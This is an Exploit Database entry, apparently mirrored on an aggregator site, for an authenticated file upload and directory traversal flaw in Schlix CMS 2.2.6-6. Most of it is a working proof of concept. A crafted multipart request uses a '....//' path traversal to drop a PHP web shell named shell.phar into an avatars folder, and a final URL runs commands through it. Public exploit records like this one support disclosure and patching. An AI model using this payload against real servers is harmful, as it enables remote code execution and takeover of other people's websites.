Schlix CMS 2.2.6-6 – Arbitary File Upload (Authenticated)

• Exploit Database
• 14 阅读

• 作者： Emir Polat
  日期： 2021-05-24
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49897/

• # Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)
  # Date: 21.05.2021
  # Exploit Author: Emir Polat
  # Vendor Homepage: https://www.schlix.com/
  # Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
  # Version: 2.2.6-6
  # Tested On: Ubuntu 20.04 (Firefox)
  
  ############################################################################################################
  
  Summary: An authorized user can upload a file with a .phar extension
  to a path of his choice and control the content as he wishes. This causes RCE vulnerability.
  
  For full technical details and source code analysis:
  https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e.
  
  ############################################################################################################
  
  PoC:
  
  1-) Login to admin panel with true credentials and go to "Tools ->
  Mediamanager" menu from left side.
  
  2-)Click the "Upload File" and upload a file and catch the request with Burp.
  
  3-) Change the "uploadstartpath", "filename" and file content as follows.
  
  # Request
  
  POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1
  Host: vulnerable-server
  Content-Length: 846
  X-Schlix-Ajax: 1
  X-Requested-With: XMLHttpRequest
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  Content-Type: multipart/form-data;
  boundary=----WebKitFormBoundarybllOFLruz1WAs7K2
  Accept: */*
  Origin: http:// <http://10.211.55.4/>vulnerable-server
  Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager
  <http://10.211.55.4/schlix/admin/app/core.mediamanager>
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf;
  schlix-your-cookie;__atuvc=5%7C20;
  schlix_frontendedit_control_showblock=-2;
  schlix_frontendedit_control_showhide=-2;
  schlix_frontendedit_control_showdoc=-2
  Connection: close
  
  ------WebKitFormBoundarybllOFLruz1WAs7K2
  Content-Disposition: form-data; name="_csrftoken"
  
  {your_csrf_token}
  ------WebKitFormBoundarybllOFLruz1WAs7K2
  Content-Disposition: form-data; name="uploadstartpath"
  
  /media/docs/....//....//....//....//system/images/avatars/large/
  ------WebKitFormBoundarybllOFLruz1WAs7K2
  Content-Disposition: form-data; name="filedata[]"; filename="shell.phar"
  
  <?PHP system($_GET['rce']);?>
  
  ------WebKitFormBoundarybllOFLruz1WAs7K2
  Content-Disposition: form-data; name="MAX_FILE_SIZE"
  
  2097152
  ------WebKitFormBoundarybllOFLruz1WAs7K2
  Content-Disposition: form-data; name="filedata__total_file_size"
  
  0
  ------WebKitFormBoundarybllOFLruz1WAs7K2
  Content-Disposition: form-data; name="filedata__max_file_count"
  
  20
  ------WebKitFormBoundarybllOFLruz1WAs7K2--
  
  
  4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".